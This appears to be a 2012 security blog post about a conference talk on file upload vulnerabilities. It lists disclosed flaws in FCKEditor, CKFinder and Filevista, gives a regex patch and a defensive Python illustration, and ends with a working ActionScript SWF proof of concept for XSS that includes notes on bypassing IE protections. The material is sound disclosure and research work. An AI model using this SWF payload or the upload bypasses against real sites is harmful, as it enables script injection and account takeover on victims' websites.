Monthly Archives: November 2012

File in the hole! – HackPra slides

Last week, I gave a talk at Bochum University about file upload vulnerabilities. I am going to share the slides and clips with you, as they are already public on the HackPra website:

I have been told that the video will be available soon as well. I really recommend that you watch the other talks on that website too.

Here are my slides in different formats:

Download the PowerPoint format

Download the PDF format

In this talk, I revealed some 0-days as examples (the vendors already know about these issues):

File Upload Protection bypass in FCKEditor 2.6.8 ASP version (Mostafa Azizi, Soroush Dalili) [Page 53 of PowerPoint file]

Denial of Service issue in FCKEditor 2.6.8/CKFinder 2.3 (Soroush Dalili) [Page 54 of PowerPoint file]

Directory Traversal in GleamTech Filevista (Soroush Dalili) [Page 22 of PowerPoint file]

You may be able to find similar issues in other web applications that have file upload functionality by using some of these methods.


Note: Quick patch for FCKEditor 2.6.8 File Upload Bypass:

In “config.asp”, wherever you have:

      ConfigAllowedExtensions.Add "File", "Extensions Here"

Change it to:

      ConfigAllowedExtensions.Add "File", "^(Extensions Here)$"
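As an added illustration of what the `^( ... )$` anchors change (this is not FCKEditor's code and does not reproduce the exact bypass from the slides): when an "a|b|c" allow-list is handed to a regex engine with search semantics, any extension string that merely contains a listed value passes; the anchored form only accepts the whole string. The sample list and the `extension_of` helper are constructed for the example.

```python
import re

# Allow-list in the same "a|b|c" form as the FCKEditor config line above.
# Constructed sample, not the real default list.
ALLOWED = "gif|jpeg|jpg|png|pdf|txt|zip"


def is_allowed_unanchored(ext: str) -> bool:
    """Check as it behaves before the patch: the bare list is the pattern and
    the engine asks whether it matches *anywhere* in the extension string
    (VBScript's RegExp.Test has search semantics, like re.search here)."""
    return re.search(ALLOWED, ext, re.IGNORECASE) is not None


def is_allowed_anchored(ext: str) -> bool:
    """Check with the quick patch applied: the list is wrapped in ^( ... )$,
    so the entire extension string must equal one listed value.
    (In Python, $ also matches before a trailing newline; re.fullmatch avoids
    that, but ^(...)$ is kept here to mirror the patched config line.)"""
    return re.search(r"^(" + ALLOWED + r")$", ext, re.IGNORECASE) is not None


def extension_of(filename: str) -> str:
    """Constructed helper: everything after the first dot, lower-cased.
    How a real upload handler derives the extension is a separate question;
    the point of this example is what the anchors change once that string
    is in hand."""
    _, _, ext = filename.partition(".")
    return ext.lower()


def compare(filenames):
    """Return {filename: (unanchored verdict, anchored verdict)}."""
    return {
        name: (is_allowed_unanchored(extension_of(name)),
               is_allowed_anchored(extension_of(name)))
        for name in filenames
    }


if __name__ == "__main__":
    # Constructed upload names; the last two pass only the unanchored check.
    samples = ["report.pdf", "photo.JPG", "page.asp", "photo.jpg.asp", "notes.txtx"]
    for name, (loose, strict) in compare(samples).items():
        print(f"{name:16} unanchored={str(loose):5} anchored={str(strict):5}")
```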

XSS by uploading/including a SWF file

As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to present the SWF file that you can use in your PoCs.

This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.

Note: IE has a protection that makes the “document” object inaccessible when you open a SWF directly in the browser. I have bypassed the IE8 protection by using a simple redirection in JavaScript. I have also found a noisy way to bypass the IE9 protection by opening a new window (you may be able to do it in a less noisy way – please leave your comments if you know any other bypass method).

Here is the ActionScript code:

	package {
		import flash.display.Sprite;
		import flash.external.*;
		import flash.system.System;
		public class XSSProject extends Sprite {
			public function XSSProject() {
				ExternalInterface.marshallExceptions = true;
				try {
					// the leading "0);}catch(e){};" closes the wrapper Flash puts around the call,
					// so the value of the "js" FlashVar is then evaluated as plain JavaScript
					ExternalInterface.call("0);}catch(e){};"+root.loaderInfo.parameters.js+"///*PoC by Soroush Dalili @IRSDL - only for testing/educational purposes - He accepts no responsibility for any bad/malicious usage*/");
				} catch(e:Error) {
				}
			}
		}
	}

The compiled file is accessible via:

Browsers other than IE:


[1] The other reason to beware (URL:

[2] Flash JavaScript Injection – can make the websites vulnerable to XSS (URL: